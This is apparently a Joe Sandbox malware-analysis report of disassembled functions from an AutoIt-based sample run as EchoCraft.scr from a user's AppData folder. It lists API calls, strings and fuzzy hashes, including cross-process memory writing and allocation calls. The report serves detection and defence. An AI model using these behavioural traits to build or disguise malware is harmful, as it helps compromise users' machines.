Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3715f157585e4a5de6d9b79e30bb689dfc68721b2b977b7bb85b43625985c057
Instruction ID: b00d71d69b34cdbc9604f2b2c4f7e9e7476f93f8ba23964e805d203ffaee5b0b
Opcode Fuzzy Hash: 3715f157585e4a5de6d9b79e30bb689dfc68721b2b977b7bb85b43625985c057
Instruction Fuzzy Hash: AAF06D76200311BBDB111FA5EC4DF963BAEEF89760F918424FA45D72A0DE70DC108A60

Function 00AF0B69 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0B7E
CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0B8B
CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0B98
CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0BA5
CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0BB2
CloseHandle.KERNEL32(?,?,?,?,00AF09E1,?,00AF3C13,?,00000001,00AC4EA0,?), ref: 00AF0BBF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9192a18700137c5074d7188044c541b875000acf73393c6b2854057de7c566bd
Instruction ID: 9ebec1785a1cc1c8b82d4b76f76ad06c127ed03eaaf91cc771c0703ab55c6175
Opcode Fuzzy Hash: 9192a18700137c5074d7188044c541b875000acf73393c6b2854057de7c566bd
Instruction Fuzzy Hash: 5001A271801B19DFCB309FA6D880822F7F5BF503193158A3EE29652932C770A945CF80

Function 00AE6460 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AE6474
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AE648B
MessageBeep.USER32(00000000), ref: 00AE64A3
KillTimer.USER32(?,0000040A), ref: 00AE64BF
EndDialog.USER32(?,00000001), ref: 00AE64D9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 174c115d5444a62e80749cc325f5d87e1f724ab3749793d18a94535585b2c2c1
Instruction ID: 543a425fdbcff0011a2d95868a5f915dc8da1d7366fe5051fe3197c0b822b06d
Opcode Fuzzy Hash: 174c115d5444a62e80749cc325f5d87e1f724ab3749793d18a94535585b2c2c1
Instruction Fuzzy Hash: E801A430500714ABEB315F21DE5EBD677B8FF10745F404A59B686A24E1EBF4A984CB90

Function 00ABDB5A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00ABDB72

Part of subcall function 00AB2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?), ref: 00AB2DFE
Part of subcall function 00AB2DE8: GetLastError.KERNEL32(?,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?,?), ref: 00AB2E10

_free.LIBCMT ref: 00ABDB84
_free.LIBCMT ref: 00ABDB96
_free.LIBCMT ref: 00ABDBA8
_free.LIBCMT ref: 00ABDBBA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1129ed2ef4230e3f8cca04659492e96e77cb27dcdb57f57f032c78211d8377bf
Instruction ID: 6c5a5248fb8958d6e9863e4167656563bb26d5ba398782ae88c322b737b746ae
Opcode Fuzzy Hash: 1129ed2ef4230e3f8cca04659492e96e77cb27dcdb57f57f032c78211d8377bf
Instruction Fuzzy Hash: 87F03636744204BBDA20FB58E981DAA77EDBE017107950C0AF009D7513DF30FD808B64

Function 00AB2630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00AB264E

Part of subcall function 00AB2DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?), ref: 00AB2DFE
Part of subcall function 00AB2DE8: GetLastError.KERNEL32(?,?,00ABDBF1,?,00000000,?,00000000,?,00ABDC18,?,00000007,?,?,00ABE016,?,?), ref: 00AB2E10

_free.LIBCMT ref: 00AB2660
_free.LIBCMT ref: 00AB2673
_free.LIBCMT ref: 00AB2684
_free.LIBCMT ref: 00AB2695

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ec1977ef5c45362e2638105d04647bd1b31a0cb7cd748cef25666f3732f5f9ac
Instruction ID: ba6b910480766e855302ace7ec1b305825fa4e843975d1206324b926fa889add
Opcode Fuzzy Hash: ec1977ef5c45362e2638105d04647bd1b31a0cb7cd748cef25666f3732f5f9ac
Instruction Fuzzy Hash: 11F01279A023609BEB01BF19BD017A83BA8FB1A712F410987F414D7272CF310A439F95

Function 00AB12D7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00AB1489
__freea.LIBCMT ref: 00AB14A7

Part of subcall function 00AB18C7: _free.LIBCMT ref: 00AB18DF

Strings

a/p, xrefs: 00AB156E
am/pm, xrefs: 00AB150A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 39e6e61a5e014924e6b3a01f1c30b2ab7ea047d0347b23ebcc7d487e4359c7e8
Instruction ID: fbaf6d3dc8a11be01fe4a418733ee32f0a169fec8cfd53ba7bdef801caa0c72b
Opcode Fuzzy Hash: 39e6e61a5e014924e6b3a01f1c30b2ab7ea047d0347b23ebcc7d487e4359c7e8
Instruction Fuzzy Hash: 0AD12575900206CBDB289F68C9B5BFABBBDFF05300FA84159E5029B653E7359D81CB90

Function 00AE2F16 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEBC27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AE29D0,?,?,00000034,00000800,?,00000034), ref: 00AEBC51

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AE2F60

Part of subcall function 00AEBBF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AE29FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00AEBC1C

Part of subcall function 00AEBB4E: GetWindowThreadProcessId.USER32(?,?), ref: 00AEBB79
Part of subcall function 00AEBB4E: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AE2994,00000034,?,?,00001004,00000000,00000000), ref: 00AEBB89
Part of subcall function 00AEBB4E: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AE2994,00000034,?,?,00001004,00000000,00000000), ref: 00AEBB9F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AE2FCD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AE301A

Strings

@, xrefs: 00AE3032

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ea1e207de642b9d7eb66cf2cb1eaed7d430e55fbd4f39c545317434ac66aa7cc
Instruction ID: 16906c6e32faf9f25615e884fa8c7d51a0bb46927ddee3848228c50c54eb1bdf
Opcode Fuzzy Hash: ea1e207de642b9d7eb66cf2cb1eaed7d430e55fbd4f39c545317434ac66aa7cc
Instruction Fuzzy Hash: 51414C72900258BFDB11DFA5CD85EDEBBB8EB49700F104095FA55B7180DB716E85CB60

Function 00AB1ABE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr,00000104), ref: 00AB1AF9
_free.LIBCMT ref: 00AB1BC4
_free.LIBCMT ref: 00AB1BCE

Strings

C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr, xrefs: 00AB1AF0, 00AB1AF7, 00AB1B26, 00AB1B5E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr
API String ID: 2506810119-4005425508
Opcode ID: 130a1686cb857985bd380509667b27cc95773c185d1abd753c05431065ac92d8
Instruction ID: 60e4b91215d302c1fb9af578041b59b27757a828b3813b871ba3d7cd8e818f64
Opcode Fuzzy Hash: 130a1686cb857985bd380509667b27cc95773c185d1abd753c05431065ac92d8
Instruction Fuzzy Hash: 16317071A01318AFDB21DF99DD95EEEBBFCEF85750F5041AAE80497212E6708E41CB90

Function 00AEC9D3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AECA5C
DeleteMenu.USER32(?,00000007,00000000), ref: 00AECAA2
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B529B0,00CC5400), ref: 00AECAEB

Strings

0, xrefs: 00AECA35

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 0ba2bc017462015dc75002ade2ccda04f0991b70afc5a238acf83951cde3c326
Instruction ID: 032079c0cf701c2a10c19989741032f88cbb3d2b77a71b0cca5b4e489a69d567
Opcode Fuzzy Hash: 0ba2bc017462015dc75002ade2ccda04f0991b70afc5a238acf83951cde3c326
Instruction Fuzzy Hash: 4241AF312043819FD720DF25C885F6BBBE9EF85364F14462DF96597291EB30E906CB62

Function 00B14AF2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B1DBF4,00000000,?,?,?,?), ref: 00B14B86
GetWindowLongW.USER32 ref: 00B14BA3
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B14BB3

Strings

SysTreeView32, xrefs: 00B14B58

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 272fdbeaccd1af16fb77b771a6c75a32acb4d4fa10e404d03f00509ca195e30b
Instruction ID: f63d50b66936b29f677a7f647f7d83075937e9abb489091512523cd393766a45
Opcode Fuzzy Hash: 272fdbeaccd1af16fb77b771a6c75a32acb4d4fa10e404d03f00509ca195e30b
Instruction Fuzzy Hash: F9317A31204205ABDB259E78CC85BEB7BE9EB49334F604764F975A31E0CB74E8918B60

Function 00B03821 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B03B2E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B0384A,?,?), ref: 00B03B4B

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B0384D
_wcslen.LIBCMT ref: 00B0386E
htons.WSOCK32(00000000,?,?,00000000), ref: 00B038D9

Strings

255.255.255.255, xrefs: 00B03868, 00B0386D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 1843401ed5bf6334b2fa94491ecd012c63730ab194dc7de3781c87e330573ac8
Instruction ID: b40fea579133a35f388651bf43c5f44e4662f7f2273325c759aac1f88279c465
Opcode Fuzzy Hash: 1843401ed5bf6334b2fa94491ecd012c63730ab194dc7de3781c87e330573ac8
Instruction Fuzzy Hash: DC31AE396003019FC710CF68C589AA97BE9EF54718F24C0D9F8168B2E2DB71EE45C760

Function 00B14592 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B1461A
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B1462E
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B14652

Strings

SysMonthCal32, xrefs: 00B145E5

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ee22740d07f113dcd57bf8d21849eac60f1b2ecd2c9ff2c211fd695460ce69be
Instruction ID: c77288aefdc8e61f51efb0f2a5b64c558a49a3a867946451743be010c9d14b23
Opcode Fuzzy Hash: ee22740d07f113dcd57bf8d21849eac60f1b2ecd2c9ff2c211fd695460ce69be
Instruction Fuzzy Hash: 2521A332600218BBDF118F94CC46FEA3BA5EF49718F110294FE156B1D0DBB5AC95DB90

Function 00B14D2F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B14DE1
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B14DEF
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B14DF6

Strings

msctls_updown32, xrefs: 00B14D60

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 20f0ffeee7edd015bc699c851ccb110fbd8ad4057c4b38233fc2ce71b0a2439c
Instruction ID: 224179230f8c3217138e7f8891565accabc745928f00eabe10326f47924d8ff0
Opcode Fuzzy Hash: 20f0ffeee7edd015bc699c851ccb110fbd8ad4057c4b38233fc2ce71b0a2439c
Instruction Fuzzy Hash: B02130B5600209AFDF10DF68DC81DBB37EDEB5A364B5404A9F9009B3A1CB70EC528B60

Function 00AE9D84 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AE9DF4

Strings

#OnAutoItStartRegister, xrefs: 00AE9DCA
#requireadmin, xrefs: 00AE9DB0
#notrayicon, xrefs: 00AE9D8E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: d7dd20b952615996a396fcf207d3dbbe7f415b7eba3d8e282bab0f60256fdaef
Instruction ID: ad3d049c09751cb87a55c40fb8b017d87fed2135751d240961db8d12633a6787
Opcode Fuzzy Hash: d7dd20b952615996a396fcf207d3dbbe7f415b7eba3d8e282bab0f60256fdaef
Instruction Fuzzy Hash: B42108321043A16AD321F726ED06FFB73D89F96310F544425F94587085EBA2AD55C395

Function 00AF530B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AF531F
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AF5373
SetErrorMode.KERNEL32(00000000,?,?,00B1DBF4), ref: 00AF53E7

Strings

%lu, xrefs: 00AF5386

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 404dd80d92dc74a145386dce62716d6306985a97c449ecba8b98a8df659a4720
Instruction ID: 46e30c08c16e45353903132f2331875a078e0275bd0c1c8a92fe7e222995a10b
Opcode Fuzzy Hash: 404dd80d92dc74a145386dce62716d6306985a97c449ecba8b98a8df659a4720
Instruction Fuzzy Hash: A7312F75A00109AFDB10EF64C985EAA7BF8EF04304F148099F509DB262DB75EE46DB61

Function 00B148C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B1492B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B14940
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B1494D

Strings

msctls_trackbar32, xrefs: 00B14902

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8db80edb83011bcdcae0b43009905e18f69c99ee6269751eedb8b017e64d541d
Instruction ID: 93a89338d863cb89b91d30aad92db17bb5f67662d902abba470eda0d964aee06
Opcode Fuzzy Hash: 8db80edb83011bcdcae0b43009905e18f69c99ee6269751eedb8b017e64d541d
Instruction Fuzzy Hash: AF11E331240248BEEF106F24CC06FEB37E8EF85BA4F114524FA50E30A0C671DC919B20

Function 00AE375C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Part of subcall function 00AE35B2: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00AE35D0
Part of subcall function 00AE35B2: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE35E1
Part of subcall function 00AE35B2: GetCurrentThreadId.KERNEL32 ref: 00AE35E8
Part of subcall function 00AE35B2: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AE35EF

GetFocus.USER32 ref: 00AE3782

Part of subcall function 00AE35F9: GetParent.USER32(00000000), ref: 00AE3604

GetClassNameW.USER32(?,?,00000100), ref: 00AE37CD
EnumChildWindows.USER32(?,00AE3845), ref: 00AE37F5

Strings

%s%d, xrefs: 00AE3809

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

